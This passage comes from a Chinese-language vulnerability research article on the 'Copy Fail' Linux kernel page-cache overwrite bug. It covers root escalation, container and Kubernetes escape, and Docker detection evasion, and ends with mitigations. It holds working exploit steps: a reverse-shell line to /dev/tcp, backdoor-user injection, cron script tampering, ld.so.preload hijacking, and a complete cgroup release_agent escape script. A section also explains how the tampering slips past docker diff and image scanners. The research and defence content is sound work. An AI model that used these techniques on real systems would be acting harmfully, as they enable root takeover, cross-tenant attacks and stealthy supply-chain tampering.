# uid=0(root) gid=0(root) groups=0(root) ✅

仅 5 次写入（20 字节）即可完成注入。通用性极强——所有发行版均有/etc/profile，且包含注释行。实际攻击场景中可注入反弹 shell（bash -i>&/dev/tcp/IP/PORT 0>&1 #）或后门用户创建命令（useradd -o -u0 backdoor #）。

5.5 计划任务脚本篡改

Cron 定时任务和 systemd 服务引用的脚本或二进制文件（通常为 0755 世界可读），是完全被动的利用目标——攻击者篡改后只需等待 daemon 下次调度执行。

# 环境准备: cron job 每分钟执行 /tmp/copyfail-lab/cron_target.sh
# 脚本内容: echo "ORIGINAL $(date +%s)" >> cron.log
# 篡改脚本 page cache
python3 exp_cron_script.py /tmp/copyfail-lab/cron_target.sh
# [+] SUCCESS: script tampered in page cache ("ORIGINAL" → "HIJACKED")
# 下一次 cron 触发 (≤ 1 分钟):
tail /tmp/copyfail-lab/cron.log
# HIJACKED 1778309461   ← crond 执行了被篡改的脚本 ✅

crond 在每次触发时重新读取脚本文件内容，天然获取 page cache 中的篡改数据。systemd 引用的服务脚本同理。

配置文件 vs 脚本文件
直接修改 cron配置文件（/etc/cron.d/）或 systemdunit 文件（.service）的 page cache 在实验中也验证了技术可行性，但在实战中不可行：cronie 使用 inotify 检测配置变化——page cache 修改不触发 inotify，需要crond重启才能读取变更；systemd unit 文件的修改同样需要systemctl daemon-reload或服务重启才生效。低权限攻击者无法控制这些 daemon 操作。因此，可行的攻击路径仅限于篡改已有任务引用的脚本/二进制文件。

5.6 /etc/ld.so.preload 路径劫持

/etc/ld.so.preload列出的共享库被动态链接器在每个程序启动时优先加载。修改其中的库路径即可实现全局代码注入。

# 前提: 系统已有 /etc/ld.so.preload (用于性能监控等)
cat /etc/ld.so.preload
# /tmp/copyfail-lab/libmarker.so
python3 exp_preload_hijack.py
# [+] SUCCESS: preload path hijacked
# /tmp/copyfail-lab/libmarker.so → /tmp/copyfail-lab/libevil00.so
ls /dev/null
# [preload] EVIL LIBRARY LOADED!   ← 恶意库被每个新进程加载
# /dev/null

前提条件：目标系统必须已存在/etc/ld.so.preload（Copy Fail 无法创建新文件，只能修改已有文件的页缓存）。该文件默认不存在，但在使用 jemalloc 预加载、LD_PRELOAD 安全 agent、性能监控等场景中常见。

六、容器场景深度研究

前面梳理了页缓存覆写在宿主机上的多条提权路径。但在容器化基础设施中，这类漏洞的威胁还要更进一步：Page Cache 是一个跨越容器隔离边界的全局共享状态。

漏洞披露后，多个安全团队迅速关注了容器/K8s 场景：Juliet验证了 PSS Restricted 和 RuntimeDefault 均不阻止 AF_ALG，Stream Security在生产级 EKS 集群上完成了端到端验证，Percivalll给出了通过篡改特权 DaemonSet 共享层实现 Pod→Node 逃逸的完整 PoC（已在 ACK / EKS / GKE 上验证）。本节在这些工作基础上，通过独立实验进一步验证和扩展容器场景的攻击可行性边界。

所有结论均在真实 Kubernetes 集群（k3sv1.32 + containerd v2.0.5，CentOS Stream 8 未修补内核 4.18.0-553）上通过实验验证。

容器实验代码
本节涉及的 Pod YAML、PoC 脚本和验证工具：https://gist.github.com/0xlane/d89e230c9e18bfd8cc126452352afae6

6.1 镜像层共享：Page Cache 的跨容器传播

容器运行时（containerd、Docker）使用 overlayfs 管理容器的文件系统。对于同一个 base image（如python:3.11-slim），其镜像层在宿主机上只存储一份。所有使用该镜像的容器，其 lower layer 指向同一组 inode。

这意味着：当容器 A 通过read()读取/usr/bin/python3时，内核为该 inode 建立 page cache 条目；当容器 B 随后读取同一文件时，命中的是完全相同的 page cache 页面。

需要强调的一个前提：page cache 是内核级全局缓存，但其作用域是单机的——只有位于同一节点上的容器，才可能通过 overlayfs layer 共享指向同一组 inode，进而共享 page cache。跨节点的容器即使使用完全相同的镜像，其 page cache 也是各自独立的。这一"同节点"限制是后续所有跨容器攻击场景的根本前提。

实验验证：跨容器 page cache 共享

部署实验环境并验证 inode 共享：

# 部署两个使用相同 base image 的 Pod
kubectl create ns copyfail-lab
kubectl apply -f pod-cross-tenant.yaml    # 见 Gist
# 验证两个 Pod 共享同一 /etc/os-release inode
kubectl exec -n copyfail-lab pod-attacker -- stat -c '%i' /etc/os-release
# 208483846
kubectl exec -n copyfail-lab pod-victim-same -- stat -c '%i' /etc/os-release
# 208483846    ← 相同 inode = 共享 page cache

在攻击者 Pod 中执行 page cache 写入：

# 攻击者 Pod 中执行 PoC
kubectl exec -n copyfail-lab pod-attacker -- python3 /poc_marker.py /etc/os-release
# [*] Target: /etc/os-release
# [*] Before: 50524554
# [*] After:  deadbeef
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# 受害者 Pod (同 base image) — 立即看到被篡改的内容
kubectl exec -n copyfail-lab pod-victim-same -- \
  python3 -c "import os; print(os.pread(os.open('/etc/os-release',0),16,0).hex())"
# deadbeef54595f4e414d453d22446562
# [+] MARKER FOUND: page cache is SHARED with attacker pod!
# 对照组 (不同 base image) — 不受影响
kubectl exec -n copyfail-lab pod-victim-alpine -- head -c 16 /etc/os-release | xxd
# 00000000: 4e41 4d45 3d22 416c 7069 6e65  NAME="Alpine

宿主机直接读取 containerd snapshot 目录中的对应文件，同样看到被篡改的数据：

# 宿主机读取 snapshot 层文件
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb
# drop_caches 恢复
echo 3 > /proc/sys/vm/drop_caches
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

6.2 零特权跨租户攻击

基于上述共享机制，验证零特权跨租户攻击——攻击者和受害者在完全隔离的不同 namespace 中：

# 创建两个完全隔离的 namespace
kubectl create ns copyfail-lab      # 攻击者
kubectl create ns tenant-victim     # 受害者
# 部署 Pod (见 Gist: pod-cross-tenant.yaml)
kubectl apply -f pod-cross-tenant.yaml

前提验证 — 确认 inode 共享：

# 两个不同 namespace 的 Pod, 相同 base image → 相同 inode
kubectl exec -n copyfail-lab pod-attacker -- stat -c '%i' /bin/cat
# 1420102
kubectl exec -n tenant-victim victim-app -- stat -c '%i' /bin/cat
# 1420102    ← 相同! 即使在不同 namespace

攻击执行：

# Step 1: 确认受害者 /bin/cat 正常
kubectl exec -n tenant-victim victim-app -- \
  python3 -c "import os; print(os.pread(os.open('/bin/cat',0),16,0).hex())"
# 7f454c46020101000000000000000000  (正常 ELF header)
# Step 2: 攻击者执行 Copy Fail (无任何特权!)
kubectl exec -n copyfail-lab pod-attacker -- python3 /poc_marker.py /bin/cat
# [*] Before: 7f454c46
# [*] After:  deadbeef
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# Step 3: 受害者立即受到影响
kubectl exec -n tenant-victim victim-app -- \
  python3 -c "import os; print(os.pread(os.open('/bin/cat',0),16,0).hex())"
# deadbeef020101000000000000000000
# ↑ ELF magic 被破坏!
# Step 4: 受害者服务中断
kubectl exec -n tenant-victim victim-app -- cat /etc/hostname
# exec /usr/bin/cat: exec format error    ← 二进制无法执行
# Step 5: 恢复 (宿主机执行)
echo 3 > /proc/sys/vm/drop_caches
kubectl exec -n tenant-victim victim-app -- cat /etc/hostname
# victim-app    ← 恢复正常

关键结论：这一攻击不需要任何特殊的 capability、hostPath 挂载或安全配置放宽。唯一的前提是内核未修补且容器中可以执行 Python（或等价的 C 程序）。两个 Pod 之间无需网络连通性、不需要知道对方的 IP 或名称。

上述实验中篡改的是普通用户 Pod 中的文件，影响局限于"跨租户 DoS"。但一个自然的问题是：能否通过同样的方式实现容器逃逸——从一个零特权 Pod 获取节点级控制？

答案的关键在于攻击目标的选择。回顾 6.1 节的分析，page cache 篡改有两个前提：

① 攻击者与目标容器位于同一节点；

② 两者共享至少一个 image layer。如果目标容器以privileged: true运行，那么当被篡改的二进制在其中执行时，攻击者的 payload 就拥有了完整的节点权限。

什么样的特权容器比较容易同时满足"特权"和"同节点"两个条件？DaemonSet是一个天然的候选。DaemonSet 的定义就是在集群每个节点上各运行一个 Pod 副本——无论受陷 Pod 被调度到哪个节点，该节点上必然存在 DaemonSet 实例。而 Kubernetes 集群中恰好有不少以privileged: true运行的系统级 DaemonSet（如 kube-proxy、CNI 插件、日志收集器等），它们同时满足两项条件。

我猜测Percivalll也是基于类似的逻辑选择了 kube-proxy 作为攻击目标。kube-proxy 在主流云厂商的托管集群（Alibaba Cloud ACK、Amazon EKS、Google GKE）中均以privileged: trueDaemonSet 运行，满足上述所有条件。其 PoC 通过篡改 kube-proxy 容器中ipset二进制的 page cache，在 kube-proxy 下次调用该工具时实现节点代码执行（已在三大云平台验证）。为简化验证流程，PoC 将攻击者镜像构建为FROM registry.k8s.io/kube-proxy:v1.35.2，从而确定性地与 kube-proxy 共享包含ipset的 image layer。

寻找利用目标：节点上的层共享分析

PoC 中FROM目标镜像的做法是为了确定性地复现漏洞利用。如果要评估真实环境中的暴露面——即一个普通业务 Pod 是否天然与同节点的特权 DaemonSet 共享 image layer——可以在节点上进行如下分析：

# 1. 列出节点上所有 privileged 容器及其镜像
crictl ps -o json | jq -r '.containers[] | "\(.id) \(.image.image) \(.metadata.name)"'
# 2. 对比业务 Pod 镜像与目标 DaemonSet 镜像的 layer digest
MY_IMAGE="python:3.11-slim"
TARGET_IMAGE="registry.k8s.io/kube-proxy:v1.35.2"
crictl inspecti $MY_IMAGE | jq -r '.info.imageSpec.rootfs.diff_ids[]' > /tmp/my_layers.txt
crictl inspecti $TARGET_IMAGE | jq -r '.info.imageSpec.rootfs.diff_ids[]' > /tmp/target_layers.txt
comm -12 <(sort /tmp/my_layers.txt) <(sort /tmp/target_layers.txt)
# 有输出 → 存在共享层
# 3. 确认目标文件的 inode 是否真的被两个容器共享
# (在两个容器内分别执行)
stat -c '%d:%i' /usr/sbin/ipset    # 设备号:inode号
# 两个容器输出相同 → page cache 共享确认

如果共享的是基础库（如ld-linux-x86-64.so.2、libc.so.6），理论上攻击面更大——任何二进制执行时都会加载这些库，无需等待特定二进制被调用。但实际操作中，替换整个.so文件需要对每个 4 字节窗口逐一覆写，耗时较长；且覆写过程中如果有进程正在加载该.so，极易导致进程崩溃。

核心共享库被大量进程依赖，这一问题尤为突出——篡改libc.so.6的结果大概率是节点上的容器大面积崩溃（DoS），而非稳定获取代码执行权限。

真实攻击场景中的挑战

上述分析需要节点级权限（crictl、直接访问 containerd 存储）。而在真实攻击场景中，攻击者通过 RCE 拿到的只是一个普通 Pod 的 shell——无法直接查看同节点上还运行着哪些容器、它们使用了哪些镜像、layer digest 是否一致。这意味着攻击者无法在目标环境中直接完成上述分析，只能进行推测和盲目尝试。

但盲目在目标环境中逐个文件尝试 Copy Fail 并不明智——每次 4 字节覆写都是不可逆的（除非管理员主动 drop cache），一旦猜错目标文件或层共享关系不成立，只会在受陷容器自身留下损坏的二进制。轻则暴露攻击痕迹，重则直接导致容器崩溃、丢失已获取的立足点——本质上是一种两败俱伤的做法。

因此，预测该漏洞在容器场景中更现实的利用方式是针对特定业务环境的定向攻击：攻击者通过已入侵容器中运行的业务即可识别出该业务是什么应用（Web 框架、中间件版本、base image 类型等）。

如果该业务使用的是通用的公开镜像或常见技术栈，攻击者可以在本地复现相同的部署环境（相同镜像 + 相同 K8s 发行版），进行白盒分析——寻找特权容器、确认 layer 共享关系、定位可利用的共享文件、调试 payload——然后带着确定性的利用方案回到目标环境中一次性执行。

6.3 能否直接逃逸到宿主机？

上一节讨论的是"跨容器"提权——通过篡改特权 DaemonSet 中的二进制间接获取节点权限。但这依赖于层共享和目标容器的后续执行。一个更激进的问题是：能否跳过中间容器，直接让宿主机进程执行被篡改的 page cache 数据？

Copy Fail 能篡改任意文件的 page cache，但仅篡改数据是不够的——还需要宿主机上的进程在其自身的特权上下文中加载并执行这些被篡改的数据。单纯的read()不构成逃逸；只有当读取的数据被作为代码执行（如execve()、dlopen()、解析后跳转）时，才能转化为代码执行。

但首先需要回答一个更基本的问题：如果宿主机进程确实访问了某个文件，它加载的是磁盘上的原始内容还是 page cache 中被篡改的数据？

答案是后者。Page cache 是内核为所有文件 I/O 设置的全局透明缓存层。无论是read()还是execve()，内核加载文件内容的路径都经过 page cache（通过filemap_read/ readahead）。如果某个 inode 对应的页面已在 page cache 中，内核直接返回缓存数据，不会重新读取磁盘——这一行为与访问者处于哪个 namespace 无关。

Section 6.1 中的实验提供了直接证据。容器内通过 Copy Fail 篡改/etc/os-release的 page cache 后：

# 宿主机通过 snapshot 路径读取同一 inode — 读到篡改后的数据
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb
# drop_caches 强制驱逐 page cache — 内核从磁盘重新加载
echo 3 > /proc/sys/vm/drop_caches
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

drop_caches 前后的对比清楚地表明：宿主机读取到的是 page cache 内容而非磁盘数据。对于execve()也是同样的机制——后续 Section 6.4 中的 hostPath 实验将直接验证这一点：容器篡改/usr/bin/ls的 page cache 后，宿主机执行ls返回exit 126（exec format error），证明内核在execve()时同样从 page cache 加载了被篡改的 ELF header，而非从磁盘读取原始文件。

因此，page cache 篡改对宿主机确实是全局可见的，对read()和execve()同样生效。真正的问题在于：在标准容器运行流程中，宿主机进程是否会主动访问容器 snapshot 层中的文件 inode？可以想到两类候选场景：

容器运行时（containerd + runc）
在容器创建/启动过程中是否会在宿主机上下文中execve()或dlopen()snapshot 层中的文件？
宿主机上的其他工具
（如 EDR、合规扫描）是否会执行容器层中的二进制、加载其.so、或解释执行其脚本？

针对场景 1，通过bpftrace追踪容器启动时 runc 和 containerd 的行为：

# 追踪 runc init 进程读取文件时的 mount namespace
bpftrace -e '
kprobe:vfs_read /comm =="runc:[2:INIT]"/ {
$task = (struct task_struct *)curtask;
$mntns =$task->nsproxy->mnt_ns->ns.inum;
    printf("runc-init vfs_read mntns=%u file=%s\n",
$mntns, str(((struct file *)arg0)->f_path.dentry->d_name.name));
}' &
# 触发容器创建
kubectl run test-probe --image=python:3.11-slim --restart=Never-- sleep 10
# 输出:
# runc-init vfs_read mntns=4026533841 file=passwd
# runc-init vfs_read mntns=4026533841 file=group
# ↑ mntns ≠ 宿主机(4026531840), 说明已在容器 namespace 内

# 追踪 containerd 进程的 vfs_read
bpftrace -e '
kprobe:vfs_read /comm == "containerd"/ {
    printf("containerd vfs_read: %s\n",
           str(((struct file *)arg0)->f_path.dentry->d_name.name));
}' -- 60   # 监控 60 秒, 期间创建/删除容器
# 结果: 仅看到 config.json, meta.db 等元数据文件
# 从未读取 snapshot 层的 /bin/*, /etc/* 等文件内容

containerd 自身的追踪结果也印证了这一点——它只操作元数据（config.json、meta.db），不会读取更不会执行 snapshot 层中的用户文件。

对于场景 2（宿主机工具），这不属于通用场景——是否存在这类行为取决于具体业务环境中节点上部署了什么软件，不具备普遍性，因此不在此做针对性测试。但也不排除某些特定环境下存在宿主机进程会执行容器层文件的情况。

结论：在标准 Kubernetes (containerd) 环境下，通用的零特权容器→宿主机直接逃逸在架构层面不可行。容器运行时的设计确保了：runc 对容器 rootfs 的操作发生在已切换的 mount namespace 中，containerd 不接触 snapshot 层的用户数据。但如果节点上存在非标准的宿主机服务会从容器层路径加载并执行文件，则可能构成特定环境下的逃逸向量。Docker 环境存在架构层面的差异，将在 Section 6.5 中单独讨论。

6.4 特权配置与容器逃逸

虽然零特权逃逸不可行，但如果容器拥有某些特权配置，Copy Fail 就能作为关键的"最后一块拼图"实现容器逃逸。以下是对多种特权配置的系统性验证：

hostPath (readOnly: true) + Copy Fail → 绕过只读限制

Kubernetes 中hostPathvolume 常被配置为readOnly: true以限制容器对宿主机文件的修改。但 Copy Fail 通过 page cache 绕过了这一限制：

# Pod 配置 (见 Gist: pod-hostpath-escape.yaml)
volumes:
-name:host-bin
hostPath:
path:/usr/bin
type:Directory
volumeMounts:
-name:host-bin
mountPath:/hostbin
readOnly:true    # ← 看似安全

# 确认 mount 确实是只读
kubectl exec -n copyfail-lab hostpath-test -- mount | grep hostbin
# /dev/mapper/cl-root on /hostbin type xfs (ro,relatime,...)
# 常规写入被拒绝
kubectl exec -n copyfail-lab hostpath-test -- touch /hostbin/test
# touch: cannot touch '/hostbin/test': Read-only file system
# Copy Fail 绕过只读限制!
kubectl exec -n copyfail-lab hostpath-test -- python3 /poc_marker.py /hostbin/ls
# [*] Before: 7f454c46
# [*] After:  deadbeef
# [+] SUCCESS: page cache corrupted!
# 宿主机验证
ls
# bash: /usr/bin/ls: cannot execute binary file: Exec format error
# Exit code: 126

这是 Copy Fail 最独特的价值：将 O_RDONLY 文件描述符变为可写攻击面。传统认知中，readOnly mount 至少能防止文件被篡改——Copy Fail 打破了这个假设。

CAP_DAC_READ_SEARCH + Copy Fail → Shocker 升级版

CAP_DAC_READ_SEARCHcapability 允许进程绕过文件和目录的读权限检查。经典的 Shocker 攻击利用open_by_handle_at()系统调用配合这个 capability 获取宿主机文件系统的 fd。但 Shocker 原本只能读取宿主机文件。

结合 Copy Fail，攻击链变为：

# 部署带 CAP_DAC_READ_SEARCH 的容器
kubectl apply -f -<
apiVersion:v1
kind:Pod
metadata:
name:shocker-test
namespace:copyfail-lab
spec:
containers:
-name:test
image:python:3.11-slim
command: ["sleep", "infinity"]
securityContext:
capabilities:
add: ["DAC_READ_SEARCH"]
EOF

攻击过程（容器内执行 Python）：

kubectl exec -n copyfail-lab shocker-test -- python3 -c "
import os, struct, ctypes
# 1. Shocker: open_by_handle_at() 获取宿主机根目录 fd
libc = ctypes.CDLL('libc.so.6', use_errno=True)
# ... (构造 root inode handle, 调用 open_by_handle_at)
# 2. openat() 打开宿主机 /usr/bin/cat (只读即可)
# 3. Copy Fail 篡改 page cache
"
# 实验输出:
# [1] Host root fd: 4
# [+] Host / contents: ['.autorelabel', 'bin', 'boot', 'dev', 'etc', ...]
# [2] Host /usr/bin/cat fd: 7
# [3] Before: 7f454c46020101000000000000000000
# [4] After:  deadbeef020101000000000000000000
# [+] SUCCESS: Host /usr/bin/cat corrupted via Shocker + Copy Fail!

CAP_SYS_ADMIN + Copy Fail → cgroup release_agent 逃逸

# 部署带 CAP_SYS_ADMIN 的容器
kubectl apply -f -<
apiVersion:v1
kind:Pod
metadata:
name:sysadmin-test
namespace:copyfail-lab
spec:
containers:
-name:test
image:python:3.11-slim
command: ["sleep", "infinity"]
securityContext:
capabilities:
add: ["SYS_ADMIN"]
EOF

容器内利用 cgroup v1 release_agent：

kubectl exec -n copyfail-lab sysadmin-test -- bash -c '
# 挂载 cgroup 子系统
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
# 确认 release_agent 可写
echo 1 > /tmp/cgrp/x/notify_on_release
# 设置 release_agent 为容器 upperdir 中的脚本路径
host_path=$(sed -n "s/.*upperdir=\([^,]*\).*/\1/p" /proc/self/mountinfo)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# 写入逃逸命令
echo "#!/bin/sh" > /cmd
echo "id > /tmp/cgrp/output; hostname >> /tmp/cgrp/output" >> /cmd
chmod +x /cmd
# 触发
echo $$ > /tmp/cgrp/x/cgroup.procs
sleep 1 && echo 0 > /tmp/cgrp/x/cgroup.procs
sleep 1 && cat /tmp/cgrp/output
'
# uid=0(root) gid=0(root) groups=0(root)
# your-hostname
# ↑ 宿主机以 root 执行了命令

hostPID + CAP_SYS_PTRACE + Copy Fail

当容器共享宿主机 PID namespace 并拥有CAP_SYS_PTRACE时，可以通过/proc/1/root/访问宿主机的文件系统根目录。结合 Copy Fail 的 page cache 写入，可以篡改宿主机文件。

# 通过 /proc/1/root/ 获取宿主机文件 fd，然后 Copy Fail 篡改
kubectl exec -n copyfail-lab hostpid-test -- python3 -c "
import os
fd = os.open('/proc/1/root/usr/bin/cat', os.O_RDONLY)
# ... page_cache_write_4bytes(fd, 0, b'\xde\xad\xbe\xef')
"

结论总结

6.5 Docker 环境

前面的分析以 Kubernetes (containerd) 环境为主。Docker 环境在底层机制上完全相同——相同的 overlayfs layer 共享、相同的 page cache 全局性——因此跨容器 page cache 共享、只读 volume 绕过（-v path:ro）、Shocker 升级（--cap-add DAC_READ_SEARCH）等攻击路径在Docker环境也成立.

我也在 Docker 26.1.3 (overlay2, xfs) 环境上验证过，效果与 K8s 一致（将kubectl exec替换为docker exec、readOnly: true替换为-v path:ro即可复现）。本节不再重复这些共通结论，聚焦 Docker 独有的架构差异。

dockerd 的架构差异

Section 6.3 中验证了 K8s 环境下 containerd 仅遍历目录元数据、不读取 snapshot 层文件数据。Docker 的dockerd则不同——作为单体守护进程，docker export、docker commit、docker cp等管理 API 会以宿主机权限读取容器 overlay 文件系统的完整文件内容。如果 page cache 已被篡改，这些操作读取到的就是篡改后的数据。

需要先指出：这一行为并非 Copy Fail 独有。直接在容器内写文件也能修改内容，docker commit/export同样会包含修改。Copy Fail 的真正独特价值将在下一节"隐蔽性"中展开。

`docker export`vs`docker commit`：持久化差异

两者对 Copy Fail 篡改的处理截然不同。

docker export— 持久化。它将容器的整个文件系统平铺写入 tar 文件，逐一读取所有文件内容。page cache 中的篡改数据被写入 tar 后就永久固化，脱离 page cache 生命周期：

docker run -d --name copyfail-test python:3.11-slim sleep infinity
docker cp poc_marker.py copyfail-test:/poc_marker.py
docker exec copyfail-test python3 /poc_marker.py /usr/lib/os-release
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# page cache 被篡改期间导出 — 篡改数据固化到 tar
docker export copyfail-test > tainted.tar
tar xf tainted.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb
# drop_caches 后重新导出 — 新的 tar 恢复原始数据
echo 3 > /proc/sys/vm/drop_caches
docker export copyfail-test > clean.tar
tar xf clean.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb
# 关键: 即使 page cache 已被清除, 第一个 tar 中的篡改数据永久存在
tar xf tainted.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb  ← 永久固化

如果这个 tar 被用于docker import构建新镜像或分发到其他环境，篡改就完成了供应链传播。

docker commit— 不持久化。它创建新的镜像层，但只记录 upper layer 的变更；lower layer 以引用方式共享，文件数据不会被复制到新层。因此 committed 镜像中的 lower layer 文件仍然从 page cache（或磁盘）动态读取：

# 重新篡改 page cache
docker exec copyfail-test python3 /poc_marker.py /usr/lib/os-release
# commit 并从新镜像启动 — 读到篡改数据（来自 page cache）
docker commit copyfail-test copyfail-committed:test
docker run --rm copyfail-committed:test head -c 20 /usr/lib/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb
# drop_caches 后再启动 — 读到原始数据（从磁盘重新加载）
echo 3 > /proc/sys/vm/drop_caches
docker run --rm copyfail-committed:test head -c 20 /usr/lib/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

隐蔽性：多层检测机制的盲区

前面展示了docker export可以持久化篡改数据，但直接在容器内写文件再 export 也能达到同样效果。Copy Fail 的独特价值在于：篡改发生在 lower layer 的 page cache 中，不触发 overlayfs 的 Copy-on-Write，使得 Docker 的多层检测机制全部失效。

1.docker diff不可见

docker diff copyfail-test
# A /poc_marker.py          ← 只显示 upper layer 变更
# C /usr/local/lib/...      ← Python 缓存文件
#                           ← /usr/lib/os-release 未出现！

docker diff只检查 upper layer 变更。直接写文件会触发 CoW 写入 upper layer →docker diff立即显示；Copy Fail 修改 page cache →docker diff无感知。

2. overlay2 layer 磁盘路径同样被"污染"

LAYER=$(docker inspect copyfail-test --format '{{.GraphDriver.Data.LowerDir}}' \
        | tr ':' '\n' | xargs -I{} sh -c 'test -f {}/usr/lib/os-release && echo {}' | head -1)
head -c 16 "$LAYER/usr/lib/os-release" | xxd -p
# deadbeef54595f4e414d453d22446562    ← 宿主机读 layer 路径 = 读 page cache
echo 3 > /proc/sys/vm/drop_caches
head -c 16 "$LAYER/usr/lib/os-release" | xxd -p
# 5052455454595f4e414d453d22446562    ← drop_caches 后才能看到原始数据

layer 路径上的文件和容器内的文件共享同一 inode → 都经过 page cache。宿主机上任何通过内核文件系统读取的工具（sha256sum、cat、文件完整性检查）在 page cache 被篡改期间都会读到篡改后的数据，无法区分"真实磁盘内容"和"被篡改的 page cache"。

3. Image layer digest 不变

唯一不受影响的是 image layer 的压缩 blob（docker image inspect中的RootFS.Layersdigest）——这些是独立的 tar.gz 文件，与 overlay2 中解压出的文件是不同 inode。镜像扫描工具（Trivy、Snyk 等）通常基于这些 layer blob 进行分析，因此扫描原始镜像不会检测到 Copy Fail 篡改。

对比总结

Copy Fail 在此场景的价值不在于"能做到什么"（直接写文件也能做到），而在于"做了什么而不被发现"——docker diff不报告、layer digest 不变、镜像扫描不触发，但docker export已经将篡改数据持久化并分发出去。

七、防御缓解

Copy Fail 的根本修复是升级内核（7.1）。如果无法立即升级，可通过禁用漏洞模块（7.2）进行临时缓解。在此基础上，容器环境建议额外部署 seccomp 策略阻止 AF_ALG socket 创建（7.3）。

需要注意的是，旧版 Docker 默认 seccomp、KubernetesRuntimeDefault、SELinux targeted 策略以及 sysctl 参数均不能防御此漏洞。SELinux 虽然可以通过自定义策略模块（编写.te文件拒绝alg_socket类）系统级阻止 AF_ALG socket 创建，对裸机、VM 和容器环境均有效，但需要针对每个 SELinux domain 编写规则，部署和维护复杂度远高于 seccomp 或模块禁用方案。

7.1 根本修复：升级内核

唯一彻底的解决方案是升级到包含修复补丁a664bf3d603d的内核版本。截至 2026 年 5 月，各主流发行版的修复状态如下：

受影响的内核版本范围
根据Alpine Security Tracker，受影响的精确版本范围：
4.14 ≤ kernel < 5.10.254
5.11 ≤ kernel < 5.15.204
5.16 ≤ kernel < 6.1.170
6.2 ≤ kernel < 6.6.137
6.7 ≤ kernel < 6.12.85
6.13 ≤ kernel < 6.18.22
6.19 ≤ kernel < 6.19.12

检查当前系统是否受影响：

# 1. 检查内核版本是否在受影响范围
uname -r
# 2. 检查 algif_aead 是可加载模块还是内建模块
#    有输出 → 可加载模块; 无输出 → 内建模块
modinfo algif_aead 2>/dev/null && echo "==> LOADABLE module" || echo "==> BUILT-IN or not present"
# 3. 检查是否已有缓解措施
# Debian/Ubuntu: kmod 缓解
grep -r algif_aead /etc/modprobe.d/ 2>/dev/null
# RHEL/CentOS: initcall_blacklist
cat /proc/cmdline | grep -o 'initcall_blacklist=[^ ]*'

各发行版的系统更新命令：

# Debian/Ubuntu:
sudo apt update && sudo apt upgrade
# Alpine:
apk update && apk upgrade
# Arch:
pacman -Syu
# SUSE:
zypper update
# RHEL/CentOS:
sudo dnf update kernel && reboot
# Fedora:
sudo dnf upgrade --refresh && reboot

CISA KEV
此漏洞已于 2026-05-01 被CISA 加入 KEV 目录，截止修复日期为 2026-05-15。

7.2 临时缓解：禁用漏洞模块

如果无法立即升级内核，可以通过禁用algif_aead模块进行临时缓解。不同发行版对该模块的编译方式决定了缓解方法：

可加载模块的发行版（Ubuntu / Debian / Alpine / Arch / SUSE）：

echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif_aead.conf
sudo rmmod algif_aead 2>/dev/null || sudo reboot

Ubuntu 的kmod包安全更新会自动创建上述文件。

内建模块的发行版（RHEL / CentOS / Oracle Linux / Fedora / Amazon Linux）：

对于内建模块，rmmod和/etc/modprobe.d/blacklist完全无效：

grep CRYPTO_USER_API_AEAD /boot/config-$(uname -r)
# CONFIG_CRYPTO_USER_API_AEAD=y    ← 内建! 非模块
rmmod algif_aead 2>&1
# rmmod: ERROR: Module algif_aead is builtin.

必须使用initcall_blacklist内核启动参数：

# 禁用 algif_aead 初始化
grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"
reboot
# 更激进的方式: 禁用整个 AF_ALG 接口
grubby --update-kernel=ALL --args="initcall_blacklist=af_alg_init"
reboot

验证缓解生效（所有发行版通用）：

python3 -c "import socket; socket.socket(38,5,0)" 2>&1
# 预期: OSError: [Errno 97] Address family not supported by protocol
# 或:   OSError: [Errno 93] Protocol not supported

注意事项
以上缓解可能影响使用内核硬件加速加密的应用（如 OpenSSL 的afalgengine、IPsec 的xfrm）。大多数应用会自动 fallback 到用户空间加密实现，影响极小。
KernelCare 用户
（CloudLinux）：kcarectl --update即可应用 live patch，无需重启。验证：kcarectl --patch-info | grep -i "copy.fail\|algif_aead\|CVE-2026-31431"。

7.3 容器环境防御

如果宿主机内核已升级至修复版本（7.1）或已禁用漏洞模块（7.2），漏洞已从根源消除，以下容器层面的缓解不是必须的。但作为纵深防御，仍建议部署 Seccomp 策略阻止AF_ALGsocket——这一接口在容器中几乎没有合法使用场景，阻止它不仅防御 Copy Fail，也能降低内核加密子系统未来出现新漏洞时的攻击面。

默认安全机制不防御
旧版 Docker（< 29.4.2）默认 seccomp profile、KubernetesRuntimeDefault、SELinux targeted 策略均允许socket(AF_ALG)和splice()调用，无法阻止漏洞利用。

升级 Docker 容器运行时

Docker ≥ 29.4.2已更新默认 seccomp profile(https://github.com/moby/moby/pull/52494)阻止AF_ALGsocket 创建。对于 Docker 用户，升级是最简单的防御方案，无需任何额外配置：

docker --version
# Docker version 29.4.3 或更高 → 已内置防御
# 验证
docker run --rm python:3.11-slim python3 -c "
import socket
try:
    socket.socket(38, 5, 0)
    print('[!] FAIL — AF_ALG not blocked')
except OSError as e:
